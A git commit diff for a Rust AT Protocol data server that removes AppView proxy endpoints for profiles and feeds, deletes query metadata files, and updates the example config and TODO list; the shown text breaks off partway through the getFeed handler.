Remove a bunch of unnecessary tests & endpoints

This commit is contained in:
lewis
2025-12-18 22:13:25 +02:00
parent 2cf87e2cfb
commit e929cf5af5
45 changed files with 2043 additions and 10554 deletions

View File

@@ -48,25 +48,13 @@ AWS_SECRET_ACCESS_KEY=minioadmin
# Optional: rotation key for PLC operations (defaults to user's key)
# PLC_ROTATION_KEY=did:key:...
# =============================================================================
# AppView Federation
# DID Resolution
# =============================================================================
# Cache TTL for resolved DID documents (default: 300 seconds)
# DID_CACHE_TTL_SECS=300
# =============================================================================
# Relays
# =============================================================================
# AppViews are resolved via DID-based discovery. Configure by mapping lexicon
# namespaces to AppView DIDs. The DID document is fetched and the service
# endpoint is extracted automatically.
#
# Format: APPVIEW_DID_<NAMESPACE>=<did>
# Where <NAMESPACE> uses underscores instead of dots (e.g., APP_BSKY for app.bsky)
#
# Default: app.bsky and com.atproto -> did:web:api.bsky.app
#
# Examples:
# APPVIEW_DID_APP_BSKY=did:web:api.bsky.app
# APPVIEW_DID_COM_WHTWND=did:web:whtwnd.com
# APPVIEW_DID_BLUE_ZIO=did:plc:some-custom-appview
#
# Cache TTL for resolved AppView endpoints (default: 300 seconds)
# APPVIEW_CACHE_TTL_SECS=300
#
# Comma-separated list of relay URLs to notify via requestCrawl
# CRAWLERS=https://bsky.network,https://relay.upcloud.world
# =============================================================================

View File

@@ -1,28 +0,0 @@
{
"db_name": "PostgreSQL",
"query": "SELECT key_bytes, encryption_version FROM user_keys k JOIN users u ON k.user_id = u.id WHERE u.did = $1",
"describe": {
"columns": [
{
"ordinal": 0,
"name": "key_bytes",
"type_info": "Bytea"
},
{
"ordinal": 1,
"name": "encryption_version",
"type_info": "Int4"
}
],
"parameters": {
"Left": [
"Text"
]
},
"nullable": [
false,
true
]
},
"hash": "36001fc127d7a3ea4e53e43a559cd86107e74d02ddcc499afd81049ce3c6789b"
}

View File

@@ -1,46 +0,0 @@
{
"db_name": "PostgreSQL",
"query": "SELECT r.record_cid, r.rkey, r.created_at, u.did, u.handle\n FROM records r\n JOIN repos rp ON r.repo_id = rp.user_id\n JOIN users u ON rp.user_id = u.id\n WHERE u.did = ANY($1) AND r.collection = 'app.bsky.feed.post'\n ORDER BY r.created_at DESC\n LIMIT 50",
"describe": {
"columns": [
{
"ordinal": 0,
"name": "record_cid",
"type_info": "Text"
},
{
"ordinal": 1,
"name": "rkey",
"type_info": "Text"
},
{
"ordinal": 2,
"name": "created_at",
"type_info": "Timestamptz"
},
{
"ordinal": 3,
"name": "did",
"type_info": "Text"
},
{
"ordinal": 4,
"name": "handle",
"type_info": "Text"
}
],
"parameters": {
"Left": [
"TextArray"
]
},
"nullable": [
false,
false,
false,
false,
false
]
},
"hash": "4bc1e1169d95eac340756b1ba01680caa980514d77cc7b41361c2400f6a5f456"
}

View File

@@ -1,23 +0,0 @@
{
"db_name": "PostgreSQL",
"query": "SELECT 1 as val FROM records WHERE repo_id = $1 AND repo_rev <= $2 LIMIT 1",
"describe": {
"columns": [
{
"ordinal": 0,
"name": "val",
"type_info": "Int4"
}
],
"parameters": {
"Left": [
"Uuid",
"Text"
]
},
"nullable": [
null
]
},
"hash": "5f02d646eb60f99f5cc1ae7b8b41e62d053a6b9f8e9452d5cef3526b8aef8288"
}

View File

@@ -1,22 +0,0 @@
{
"db_name": "PostgreSQL",
"query": "SELECT record_cid FROM records WHERE repo_id = $1 AND collection = 'app.bsky.actor.profile' AND rkey = 'self'",
"describe": {
"columns": [
{
"ordinal": 0,
"name": "record_cid",
"type_info": "Text"
}
],
"parameters": {
"Left": [
"Uuid"
]
},
"nullable": [
false
]
},
"hash": "94e290ff1acc15ccb8fd57fce25c7a4eea1e45c7339145d5af2741cc04348c8f"
}

View File

@@ -1,22 +0,0 @@
{
"db_name": "PostgreSQL",
"query": "SELECT record_cid FROM records WHERE repo_id = $1 AND collection = 'app.bsky.graph.follow' LIMIT 5000",
"describe": {
"columns": [
{
"ordinal": 0,
"name": "record_cid",
"type_info": "Text"
}
],
"parameters": {
"Left": [
"Uuid"
]
},
"nullable": [
false
]
},
"hash": "a3e7b0c0861eaf62dda8b3a2ea5573bbb64eef74473f2b73cb38e2948cb3d7cc"
}

View File

@@ -1,47 +0,0 @@
{
"db_name": "PostgreSQL",
"query": "\n SELECT record_cid, collection, rkey, created_at, repo_rev\n FROM records\n WHERE repo_id = $1 AND repo_rev > $2\n ORDER BY repo_rev ASC\n LIMIT 10\n ",
"describe": {
"columns": [
{
"ordinal": 0,
"name": "record_cid",
"type_info": "Text"
},
{
"ordinal": 1,
"name": "collection",
"type_info": "Text"
},
{
"ordinal": 2,
"name": "rkey",
"type_info": "Text"
},
{
"ordinal": 3,
"name": "created_at",
"type_info": "Timestamptz"
},
{
"ordinal": 4,
"name": "repo_rev",
"type_info": "Text"
}
],
"parameters": {
"Left": [
"Uuid",
"Text"
]
},
"nullable": [
false,
false,
false,
false,
true
]
},
"hash": "f3f1634b4f03a4c365afa02c4504de758bc420f49a19092d5cd1c526c7c7461e"
}

39
TODO.md
View File

@@ -38,19 +38,20 @@ Accounts controlled by other accounts rather than having their own password. Whe
- [ ] Log all actions with both actor DID and controller DID
- [ ] Audit log view for delegated account owners
### Passkey support
Modern passwordless authentication using WebAuthn/FIDO2, alongside or instead of passwords.
### Passkeys and 2FA
Modern passwordless authentication using WebAuthn/FIDO2, plus TOTP for defense in depth.
- [ ] passkeys table (id, did, credential_id, public_key, sign_count, created_at, last_used, friendly_name)
- [ ] Generate WebAuthn registration challenge
- [ ] Verify attestation response and store credential
- [ ] UI for registering new passkey from settings
- [ ] Detect if account has passkeys during OAuth authorize
- [ ] Offer passkey option alongside password
- [ ] Generate authentication challenge and verify assertion
- [ ] Update sign count (replay protection)
- [ ] Allow creating account with passkey instead of password
- [ ] List/rename/remove passkeys in settings
- [ ] user_totp table (did, secret_encrypted, verified, created_at, last_used)
- [ ] WebAuthn registration challenge generation and attestation verification
- [ ] TOTP secret generation with QR code setup flow
- [ ] Backup codes (hashed, one-time use) with recovery flow
- [ ] OAuth authorize flow: password → 2FA (if enabled) → passkey (as alternative)
- [ ] Passkey-only account creation (no password)
- [ ] Settings UI for managing passkeys, TOTP, backup codes
- [ ] Trusted devices option (remember this browser)
- [ ] Rate limit 2FA attempts
- [ ] Re-auth for sensitive actions (email change, adding new auth methods)
### Private/encrypted data
Records that only authorized parties can see and decrypt. Requires key federation between PDSes.
@@ -65,6 +66,22 @@ Records that only authorized parties can see and decrypt. Requires key federatio
- [ ] Protocol for sharing decryption keys between PDSes
- [ ] Handle key rotation and revocation
### Plugin system
Extensible architecture allowing third-party plugins to add functionality, like Minecraft mods or browser extensions.
- [ ] Research: survey Fabric/Forge, VS Code, Grafana, Caddy plugin architectures
- [ ] Evaluate rust approaches: WASM, dynamic linking, subprocess IPC, embedded scripting (Lua/Rhai)
- [ ] Define security model (sandboxing, permissions, resource limits)
- [ ] Plugin manifest format (name, version, deps, permissions, hooks)
- [ ] Plugin discovery, loading, lifecycle (enable/disable/hot reload)
- [ ] Error isolation (bad plugin shouldn't crash PDS)
- [ ] Extension points: request middleware, record lifecycle hooks, custom XRPC endpoints
- [ ] Extension points: custom lexicons, storage backends, auth providers, notification channels
- [ ] Extension points: firehose consumers (react to repo events)
- [ ] Plugin SDK crate with traits and helpers
- [ ] Example plugins: custom feed algorithm, content filter, S3 backup
- [ ] Plugin registry with signature verification and version compatibility
---
## Completed

View File

@@ -1,5 +1,3 @@
// app.bsky.actor XRPC handler modules for the PDS.
mod preferences;
mod profile;
// Re-export the handler functions so the router can reference them flatly.
pub use preferences::{get_preferences, put_preferences};
pub use profile::{get_profile, get_profiles};

View File

@@ -1,290 +0,0 @@
use crate::api::proxy_client::proxy_client;
use crate::state::AppState;
use axum::{
Json,
extract::{Query, RawQuery, State},
http::StatusCode,
response::{IntoResponse, Response},
};
use jacquard_repo::storage::BlockStore;
use serde::{Deserialize, Serialize};
use serde_json::{Value, json};
use std::collections::HashMap;
use tracing::{error, info};
/// Query parameters for `app.bsky.actor.getProfile`.
#[derive(Deserialize)]
pub struct GetProfileParams {
// Handle or DID identifying the profile to fetch.
pub actor: String,
}
/// Detailed profile view as returned by the upstream AppView.
/// Unknown fields are captured in `extra` so this proxy stays
/// forward-compatible with AppView schema additions.
#[derive(Serialize, Deserialize, Clone)]
#[serde(rename_all = "camelCase")]
pub struct ProfileViewDetailed {
pub did: String,
pub handle: String,
#[serde(skip_serializing_if = "Option::is_none")]
pub display_name: Option<String>,
#[serde(skip_serializing_if = "Option::is_none")]
pub description: Option<String>,
#[serde(skip_serializing_if = "Option::is_none")]
pub avatar: Option<String>,
#[serde(skip_serializing_if = "Option::is_none")]
pub banner: Option<String>,
// Any additional AppView-supplied fields, passed through untouched.
#[serde(flatten)]
pub extra: HashMap<String, Value>,
}
/// Response body for `app.bsky.actor.getProfiles`.
#[derive(Serialize, Deserialize)]
pub struct GetProfilesOutput {
pub profiles: Vec<ProfileViewDetailed>,
}
/// Load the user's locally stored `app.bsky.actor.profile`/`self` record.
///
/// Resolves the user's id by DID, finds the profile record's CID, fetches
/// the block from the block store, and decodes the DAG-CBOR payload into a
/// JSON `Value`. Best-effort: any query error, missing row, unparsable CID,
/// or missing block yields `None`, and callers fall back to the AppView
/// response unmodified.
async fn get_local_profile_record(state: &AppState, did: &str) -> Option<Value> {
// `.ok()??` collapses both the query error and the "no row" case to None.
let user_id: uuid::Uuid = sqlx::query_scalar!("SELECT id FROM users WHERE did = $1", did)
.fetch_optional(&state.db)
.await
.ok()??;
let record_row = sqlx::query!(
"SELECT record_cid FROM records WHERE repo_id = $1 AND collection = 'app.bsky.actor.profile' AND rkey = 'self'",
user_id
)
.fetch_optional(&state.db)
.await
.ok()??;
let cid: cid::Cid = record_row.record_cid.parse().ok()?;
let block_bytes = state.block_store.get(&cid).await.ok()??;
serde_ipld_dagcbor::from_slice(&block_bytes).ok()
}
fn munge_profile_with_local(profile: &mut ProfileViewDetailed, local_record: &Value) {
if let Some(display_name) = local_record.get("displayName").and_then(|v| v.as_str()) {
profile.display_name = Some(display_name.to_string());
}
if let Some(description) = local_record.get("description").and_then(|v| v.as_str()) {
profile.description = Some(description.to_string());
}
}
/// Proxy a GET XRPC call (with structured query params) to the AppView
/// registered for `method`.
///
/// Resolves the upstream via the DID-based AppView registry, then delegates
/// to `proxy_request`, which attaches a per-request service token when
/// `auth_key_bytes` is available. Returns the upstream status and JSON body
/// on success, or a ready-to-send error `Response` (502 when no AppView is
/// configured for the method's namespace).
async fn proxy_to_appview(
state: &AppState,
method: &str,
params: &HashMap<String, String>,
auth_did: &str,
auth_key_bytes: Option<&[u8]>,
) -> Result<(StatusCode, Value), Response> {
let resolved = match state.appview_registry.get_appview_for_method(method).await {
Some(r) => r,
None => {
return Err((
StatusCode::BAD_GATEWAY,
Json(
json!({"error": "UpstreamError", "message": "No upstream AppView configured"}),
),
)
.into_response());
}
};
let target_url = format!("{}/xrpc/{}", resolved.url, method);
info!("Proxying GET request to {}", target_url);
let client = proxy_client();
let request_builder = client.get(&target_url).query(params);
proxy_request(request_builder, auth_did, auth_key_bytes, method, &resolved.did).await
}
/// Proxy a GET XRPC call to the AppView for `method`, forwarding the raw
/// query string verbatim.
///
/// Unlike `proxy_to_appview`, this does not parse or rebuild parameters, so
/// repeated keys and unknown params survive the round trip unchanged (used
/// by endpoints like getProfiles that accept repeated `actors` params).
/// Error shape matches `proxy_to_appview`: 502 when no upstream AppView is
/// configured for the method's namespace.
async fn proxy_to_appview_raw(
state: &AppState,
method: &str,
raw_query: Option<&str>,
auth_did: &str,
auth_key_bytes: Option<&[u8]>,
) -> Result<(StatusCode, Value), Response> {
let resolved = match state.appview_registry.get_appview_for_method(method).await {
Some(r) => r,
None => {
return Err((
StatusCode::BAD_GATEWAY,
Json(
json!({"error": "UpstreamError", "message": "No upstream AppView configured"}),
),
)
.into_response());
}
};
// Only append "?" when there actually is a query string.
let target_url = match raw_query {
Some(q) => format!("{}/xrpc/{}?{}", resolved.url, method, q),
None => format!("{}/xrpc/{}", resolved.url, method),
};
info!("Proxying GET request to {}", target_url);
let client = proxy_client();
let request_builder = client.get(&target_url);
proxy_request(request_builder, auth_did, auth_key_bytes, method, &resolved.did).await
}
/// Send a prepared upstream request, optionally signing it with a service
/// token, and normalize the response/error shapes.
///
/// When `auth_key_bytes` is present, mints an inter-service JWT scoped to
/// (`auth_did` -> `appview_did`, `method`) and attaches it as a Bearer
/// header. Failure mapping: token minting failure -> 500; unparsable JSON
/// body or transport error -> 502; upstream timeout -> 504. A non-2xx
/// upstream status is NOT an error here — it is returned to the caller
/// together with the parsed body.
async fn proxy_request(
mut request_builder: reqwest::RequestBuilder,
auth_did: &str,
auth_key_bytes: Option<&[u8]>,
method: &str,
appview_did: &str,
) -> Result<(StatusCode, Value), Response> {
if let Some(key_bytes) = auth_key_bytes {
match crate::auth::create_service_token(auth_did, appview_did, method, key_bytes) {
Ok(service_token) => {
request_builder =
request_builder.header("Authorization", format!("Bearer {}", service_token));
}
Err(e) => {
error!("Failed to create service token: {:?}", e);
return Err((
StatusCode::INTERNAL_SERVER_ERROR,
Json(json!({"error": "InternalError"})),
)
.into_response());
}
}
}
match request_builder.send().await {
Ok(resp) => {
// reqwest and axum use different http crate versions; convert via u16.
let status =
StatusCode::from_u16(resp.status().as_u16()).unwrap_or(StatusCode::BAD_GATEWAY);
match resp.json::<Value>().await {
Ok(body) => Ok((status, body)),
Err(e) => {
error!("Error parsing proxy response: {:?}", e);
Err((
StatusCode::BAD_GATEWAY,
Json(json!({"error": "UpstreamError"})),
)
.into_response())
}
}
}
Err(e) => {
error!("Error sending proxy request: {:?}", e);
if e.is_timeout() {
Err((
StatusCode::GATEWAY_TIMEOUT,
Json(json!({"error": "UpstreamTimeout"})),
)
.into_response())
} else {
Err((
StatusCode::BAD_GATEWAY,
Json(json!({"error": "UpstreamError"})),
)
.into_response())
}
}
}
}
/// Handler for `app.bsky.actor.getProfile`.
///
/// Proxies the request to the configured AppView. Authentication is
/// optional: with a valid bearer token the request is re-signed as a
/// service token, and — read-after-write — when the requested profile is
/// the caller's OWN, locally stored displayName/description overwrite the
/// (possibly stale) AppView values before returning.
pub async fn get_profile(
State(state): State<AppState>,
headers: axum::http::HeaderMap,
Query(params): Query<GetProfileParams>,
) -> Response {
// Best-effort auth: an invalid/absent token degrades to anonymous proxying.
let auth_header = headers.get("Authorization").and_then(|h| h.to_str().ok());
let auth_user = if let Some(h) = auth_header {
if let Some(token) = crate::auth::extract_bearer_token_from_header(Some(h)) {
crate::auth::validate_bearer_token(&state.db, &token)
.await
.ok()
} else {
None
}
} else {
None
};
let auth_did = auth_user.as_ref().map(|u| u.did.clone());
let auth_key_bytes = auth_user.as_ref().and_then(|u| u.key_bytes.clone());
let mut query_params = HashMap::new();
query_params.insert("actor".to_string(), params.actor.clone());
let (status, body) = match proxy_to_appview(
&state,
"app.bsky.actor.getProfile",
&query_params,
auth_did.as_deref().unwrap_or(""),
auth_key_bytes.as_deref(),
)
.await
{
Ok(r) => r,
Err(e) => return e,
};
// Pass upstream errors through unchanged.
if !status.is_success() {
return (status, Json(body)).into_response();
}
let mut profile: ProfileViewDetailed = match serde_json::from_value(body) {
Ok(p) => p,
Err(_) => {
return (
StatusCode::BAD_GATEWAY,
Json(json!({"error": "UpstreamError", "message": "Invalid profile response"})),
)
.into_response();
}
};
// Read-after-write munge only applies to the caller's own profile.
if let Some(ref did) = auth_did
&& profile.did == *did
&& let Some(local_record) = get_local_profile_record(&state, did).await {
munge_profile_with_local(&mut profile, &local_record);
}
(StatusCode::OK, Json(profile)).into_response()
}
/// Handler for `app.bsky.actor.getProfiles`.
///
/// Same proxy/read-after-write behavior as `get_profile`, but for a batch:
/// the raw query string is forwarded verbatim (preserving repeated `actors`
/// params), and only the caller's own entry in the result — if present —
/// is munged with local profile data. Authentication is optional.
pub async fn get_profiles(
State(state): State<AppState>,
headers: axum::http::HeaderMap,
RawQuery(raw_query): RawQuery,
) -> Response {
// Best-effort auth: an invalid/absent token degrades to anonymous proxying.
let auth_header = headers.get("Authorization").and_then(|h| h.to_str().ok());
let auth_user = if let Some(h) = auth_header {
if let Some(token) = crate::auth::extract_bearer_token_from_header(Some(h)) {
crate::auth::validate_bearer_token(&state.db, &token)
.await
.ok()
} else {
None
}
} else {
None
};
let auth_did = auth_user.as_ref().map(|u| u.did.clone());
let auth_key_bytes = auth_user.as_ref().and_then(|u| u.key_bytes.clone());
let (status, body) = match proxy_to_appview_raw(
&state,
"app.bsky.actor.getProfiles",
raw_query.as_deref(),
auth_did.as_deref().unwrap_or(""),
auth_key_bytes.as_deref(),
)
.await
{
Ok(r) => r,
Err(e) => return e,
};
if !status.is_success() {
return (status, Json(body)).into_response();
}
let mut output: GetProfilesOutput = match serde_json::from_value(body) {
Ok(p) => p,
Err(_) => {
return (
StatusCode::BAD_GATEWAY,
Json(json!({"error": "UpstreamError", "message": "Invalid profiles response"})),
)
.into_response();
}
};
if let Some(ref did) = auth_did {
for profile in &mut output.profiles {
if profile.did == *did {
if let Some(local_record) = get_local_profile_record(&state, did).await {
munge_profile_with_local(profile, &local_record);
}
// A DID appears at most once in the batch; stop scanning.
break;
}
}
}
(StatusCode::OK, Json(output)).into_response()
}

View File

@@ -1,158 +0,0 @@
use crate::api::read_after_write::{
FeedOutput, FeedViewPost, LikeRecord, PostView, RecordDescript, extract_repo_rev,
format_munged_response, get_local_lag, get_records_since_rev, proxy_to_appview_via_registry,
};
use crate::state::AppState;
use axum::{
Json,
extract::{Query, State},
http::StatusCode,
response::{IntoResponse, Response},
};
use serde::Deserialize;
use serde_json::Value;
use std::collections::HashMap;
use tracing::warn;
/// Query parameters for `app.bsky.feed.getActorLikes`.
#[derive(Deserialize)]
pub struct GetActorLikesParams {
// Handle or DID whose likes are requested.
pub actor: String,
pub limit: Option<u32>,
pub cursor: Option<String>,
}
/// Splice placeholder entries for locally-written likes into an AppView
/// feed (read-after-write).
///
/// For each local like, finds the first feed item strictly older than the
/// like (RFC 3339 strings compare lexicographically, which matches
/// chronological order for same-offset timestamps) and inserts a minimal
/// placeholder there; likes older than everything go at the end. Later
/// iterations scan the already-augmented feed, so multiple likes keep their
/// relative order. Placeholders carry only the liked post's uri/cid with an
/// empty author and zeroed counts — presumably the client re-hydrates the
/// full post view; TODO confirm against consumers.
fn insert_likes_into_feed(feed: &mut Vec<FeedViewPost>, likes: &[RecordDescript<LikeRecord>]) {
for like in likes {
let like_time = &like.indexed_at.to_rfc3339();
let idx = feed
.iter()
.position(|fi| &fi.post.indexed_at < like_time)
.unwrap_or(feed.len());
let placeholder_post = PostView {
uri: like.record.subject.uri.clone(),
cid: like.record.subject.cid.clone(),
author: crate::api::read_after_write::AuthorView {
did: String::new(),
handle: String::new(),
display_name: None,
avatar: None,
extra: HashMap::new(),
},
record: Value::Null,
indexed_at: like.indexed_at.to_rfc3339(),
embed: None,
reply_count: 0,
repost_count: 0,
like_count: 0,
quote_count: 0,
extra: HashMap::new(),
};
feed.insert(
idx,
FeedViewPost {
post: placeholder_post,
reply: None,
reason: None,
feed_context: None,
extra: HashMap::new(),
},
);
}
}
/// Handler for `app.bsky.feed.getActorLikes` with read-after-write support.
///
/// Proxies to the AppView, then — only when the authenticated caller is
/// viewing their OWN likes — splices in likes written locally since the
/// repo rev the AppView reported (via the rev response header). Any failure
/// in the munge path falls back to returning the upstream response as-is.
pub async fn get_actor_likes(
State(state): State<AppState>,
headers: axum::http::HeaderMap,
Query(params): Query<GetActorLikesParams>,
) -> Response {
// Best-effort auth: anonymous requests are proxied without munging.
let auth_header = headers.get("Authorization").and_then(|h| h.to_str().ok());
let auth_user = if let Some(h) = auth_header {
if let Some(token) = crate::auth::extract_bearer_token_from_header(Some(h)) {
crate::auth::validate_bearer_token(&state.db, &token)
.await
.ok()
} else {
None
}
} else {
None
};
let auth_did = auth_user.as_ref().map(|u| u.did.clone());
let auth_key_bytes = auth_user.as_ref().and_then(|u| u.key_bytes.clone());
let mut query_params = HashMap::new();
query_params.insert("actor".to_string(), params.actor.clone());
if let Some(limit) = params.limit {
query_params.insert("limit".to_string(), limit.to_string());
}
if let Some(cursor) = &params.cursor {
query_params.insert("cursor".to_string(), cursor.clone());
}
let proxy_result = match proxy_to_appview_via_registry(
&state,
"app.bsky.feed.getActorLikes",
&query_params,
auth_did.as_deref().unwrap_or(""),
auth_key_bytes.as_deref(),
)
.await
{
Ok(r) => r,
Err(e) => return e,
};
if !proxy_result.status.is_success() {
return proxy_result.into_response();
}
// Without a repo-rev header we cannot tell what the AppView has already
// indexed, so skip munging entirely.
let rev = match extract_repo_rev(&proxy_result.headers) {
Some(r) => r,
None => return proxy_result.into_response(),
};
let mut feed_output: FeedOutput = match serde_json::from_slice(&proxy_result.body) {
Ok(f) => f,
Err(e) => {
warn!("Failed to parse actor likes response: {:?}", e);
return proxy_result.into_response();
}
};
let requester_did = match &auth_did {
Some(d) => d.clone(),
None => return (StatusCode::OK, Json(feed_output)).into_response(),
};
// Resolve the `actor` param to a DID; bare handles are first stripped of
// this PDS's hostname suffix before the local users lookup.
let actor_did = if params.actor.starts_with("did:") {
params.actor.clone()
} else {
let hostname = std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string());
let suffix = format!(".{}", hostname);
let short_handle = if params.actor.ends_with(&suffix) {
params.actor.strip_suffix(&suffix).unwrap_or(&params.actor)
} else {
&params.actor
};
match sqlx::query_scalar!("SELECT did FROM users WHERE handle = $1", short_handle)
.fetch_optional(&state.db)
.await
{
Ok(Some(did)) => did,
Ok(None) => return (StatusCode::OK, Json(feed_output)).into_response(),
Err(e) => {
warn!("Database error resolving actor handle: {:?}", e);
return proxy_result.into_response();
}
}
};
// Read-after-write only applies when viewing one's own likes.
if actor_did != requester_did {
return (StatusCode::OK, Json(feed_output)).into_response();
}
let local_records = match get_records_since_rev(&state, &requester_did, &rev).await {
Ok(r) => r,
Err(e) => {
warn!("Failed to get local records: {}", e);
return proxy_result.into_response();
}
};
if local_records.likes.is_empty() {
return (StatusCode::OK, Json(feed_output)).into_response();
}
insert_likes_into_feed(&mut feed_output.feed, &local_records.likes);
let lag = get_local_lag(&local_records);
format_munged_response(feed_output, lag)
}

View File

@@ -1,160 +0,0 @@
use crate::api::read_after_write::{
FeedOutput, FeedViewPost, ProfileRecord, RecordDescript, extract_repo_rev, format_local_post,
format_munged_response, get_local_lag, get_records_since_rev, insert_posts_into_feed,
proxy_to_appview_via_registry,
};
use crate::state::AppState;
use axum::{
Json,
extract::{Query, State},
http::StatusCode,
response::{IntoResponse, Response},
};
use serde::Deserialize;
use std::collections::HashMap;
use tracing::warn;
/// Query parameters for `app.bsky.feed.getAuthorFeed`.
#[derive(Deserialize)]
pub struct GetAuthorFeedParams {
// Handle or DID whose feed is requested.
pub actor: String,
pub limit: Option<u32>,
pub cursor: Option<String>,
// AppView-defined post filter (e.g. posts_with_media); forwarded as-is.
pub filter: Option<String>,
#[serde(rename = "includePins")]
pub include_pins: Option<bool>,
}
fn update_author_profile_in_feed(
feed: &mut [FeedViewPost],
author_did: &str,
local_profile: &RecordDescript<ProfileRecord>,
) {
for item in feed.iter_mut() {
if item.post.author.did == author_did
&& let Some(ref display_name) = local_profile.record.display_name {
item.post.author.display_name = Some(display_name.clone());
}
}
}
/// Handler for `app.bsky.feed.getAuthorFeed` with read-after-write support.
///
/// Proxies to the AppView; then — only when the authenticated caller is
/// viewing their OWN feed — overlays the local profile's display name onto
/// their posts and splices in posts written locally since the repo rev the
/// AppView reported. Any failure along the munge path falls back to
/// returning the upstream response unmodified.
pub async fn get_author_feed(
State(state): State<AppState>,
headers: axum::http::HeaderMap,
Query(params): Query<GetAuthorFeedParams>,
) -> Response {
// Best-effort auth: anonymous requests are proxied without munging.
let auth_header = headers.get("Authorization").and_then(|h| h.to_str().ok());
let auth_user = if let Some(h) = auth_header {
if let Some(token) = crate::auth::extract_bearer_token_from_header(Some(h)) {
crate::auth::validate_bearer_token(&state.db, &token)
.await
.ok()
} else {
None
}
} else {
None
};
let auth_did = auth_user.as_ref().map(|u| u.did.clone());
let auth_key_bytes = auth_user.as_ref().and_then(|u| u.key_bytes.clone());
// Rebuild the upstream query, forwarding optional params only when set.
let mut query_params = HashMap::new();
query_params.insert("actor".to_string(), params.actor.clone());
if let Some(limit) = params.limit {
query_params.insert("limit".to_string(), limit.to_string());
}
if let Some(cursor) = &params.cursor {
query_params.insert("cursor".to_string(), cursor.clone());
}
if let Some(filter) = &params.filter {
query_params.insert("filter".to_string(), filter.clone());
}
if let Some(include_pins) = params.include_pins {
query_params.insert("includePins".to_string(), include_pins.to_string());
}
let proxy_result = match proxy_to_appview_via_registry(
&state,
"app.bsky.feed.getAuthorFeed",
&query_params,
auth_did.as_deref().unwrap_or(""),
auth_key_bytes.as_deref(),
)
.await
{
Ok(r) => r,
Err(e) => return e,
};
if !proxy_result.status.is_success() {
return proxy_result.into_response();
}
// Without a repo-rev header we cannot tell what the AppView has already
// indexed, so skip munging entirely.
let rev = match extract_repo_rev(&proxy_result.headers) {
Some(r) => r,
None => return proxy_result.into_response(),
};
let mut feed_output: FeedOutput = match serde_json::from_slice(&proxy_result.body) {
Ok(f) => f,
Err(e) => {
warn!("Failed to parse author feed response: {:?}", e);
return proxy_result.into_response();
}
};
let requester_did = match &auth_did {
Some(d) => d.clone(),
None => return (StatusCode::OK, Json(feed_output)).into_response(),
};
// Resolve the `actor` param to a DID; bare handles are first stripped of
// this PDS's hostname suffix before the local users lookup.
let actor_did = if params.actor.starts_with("did:") {
params.actor.clone()
} else {
let hostname = std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string());
let suffix = format!(".{}", hostname);
let short_handle = if params.actor.ends_with(&suffix) {
params.actor.strip_suffix(&suffix).unwrap_or(&params.actor)
} else {
&params.actor
};
match sqlx::query_scalar!("SELECT did FROM users WHERE handle = $1", short_handle)
.fetch_optional(&state.db)
.await
{
Ok(Some(did)) => did,
Ok(None) => return (StatusCode::OK, Json(feed_output)).into_response(),
Err(e) => {
warn!("Database error resolving actor handle: {:?}", e);
return proxy_result.into_response();
}
}
};
// Read-after-write only applies when viewing one's own feed.
if actor_did != requester_did {
return (StatusCode::OK, Json(feed_output)).into_response();
}
let local_records = match get_records_since_rev(&state, &requester_did, &rev).await {
Ok(r) => r,
Err(e) => {
warn!("Failed to get local records: {}", e);
return proxy_result.into_response();
}
};
if local_records.count == 0 {
return (StatusCode::OK, Json(feed_output)).into_response();
}
// Handle lookup failures degrade to showing the DID in place of a handle.
let handle = match sqlx::query_scalar!("SELECT handle FROM users WHERE did = $1", requester_did)
.fetch_optional(&state.db)
.await
{
Ok(Some(h)) => h,
Ok(None) => requester_did.clone(),
Err(e) => {
warn!("Database error fetching handle: {:?}", e);
requester_did.clone()
}
};
if let Some(ref local_profile) = local_records.profile {
update_author_profile_in_feed(&mut feed_output.feed, &requester_did, local_profile);
}
let local_posts: Vec<_> = local_records
.posts
.iter()
.map(|p| format_local_post(p, &requester_did, &handle, local_records.profile.as_ref()))
.collect();
insert_posts_into_feed(&mut feed_output.feed, local_posts);
let lag = get_local_lag(&local_records);
format_munged_response(feed_output, lag)
}

View File

@@ -1,131 +0,0 @@
use crate::api::ApiError;
use crate::api::proxy_client::{
MAX_RESPONSE_SIZE, is_ssrf_safe, proxy_client, validate_at_uri, validate_limit,
};
use crate::state::AppState;
use axum::{
extract::{Query, State},
http::StatusCode,
response::{IntoResponse, Response},
};
use serde::Deserialize;
use std::collections::HashMap;
use tracing::{error, info};
/// Query parameters for `app.bsky.feed.getFeed` (custom feed generators).
#[derive(Deserialize)]
pub struct GetFeedParams {
// AT-URI of the feed generator record.
pub feed: String,
pub limit: Option<u32>,
pub cursor: Option<String>,
}
/// Handler for `app.bsky.feed.getFeed`: proxy a custom-feed request to the
/// configured AppView.
///
/// Unlike the other feed handlers, authentication is REQUIRED here. The
/// feed AT-URI is validated, the resolved upstream URL is SSRF-checked,
/// `limit` is clamped (default 50, max 100), and the upstream response is
/// streamed back with its status and content-type, subject to a
/// MAX_RESPONSE_SIZE cap (checked both against Content-Length and the
/// actual body). No read-after-write munging is performed.
pub async fn get_feed(
State(state): State<AppState>,
headers: axum::http::HeaderMap,
Query(params): Query<GetFeedParams>,
) -> Response {
let token = match crate::auth::extract_bearer_token_from_header(
headers.get("Authorization").and_then(|h| h.to_str().ok()),
) {
Some(t) => t,
None => return ApiError::AuthenticationRequired.into_response(),
};
let auth_user = match crate::auth::validate_bearer_token(&state.db, &token).await {
Ok(user) => user,
Err(e) => return ApiError::from(e).into_response(),
};
if let Err(e) = validate_at_uri(&params.feed) {
return ApiError::InvalidRequest(format!("Invalid feed URI: {}", e)).into_response();
}
let resolved = match state.appview_registry.get_appview_for_method("app.bsky.feed.getFeed").await {
Some(r) => r,
None => {
return ApiError::UpstreamUnavailable("No upstream AppView configured for app.bsky.feed.getFeed".to_string())
.into_response();
}
};
// Defense in depth: refuse to proxy to private/loopback upstream addresses.
if let Err(e) = is_ssrf_safe(&resolved.url) {
error!("SSRF check failed for appview URL: {}", e);
return ApiError::UpstreamUnavailable(format!("Invalid upstream URL: {}", e))
.into_response();
}
let limit = validate_limit(params.limit, 50, 100);
let mut query_params = HashMap::new();
query_params.insert("feed".to_string(), params.feed.clone());
query_params.insert("limit".to_string(), limit.to_string());
if let Some(cursor) = &params.cursor {
query_params.insert("cursor".to_string(), cursor.clone());
}
let target_url = format!("{}/xrpc/app.bsky.feed.getFeed", resolved.url);
info!(target = %target_url, feed = %params.feed, "Proxying getFeed request");
let client = proxy_client();
let mut request_builder = client.get(&target_url).query(&query_params);
// Re-sign the request as this user with an inter-service token when the
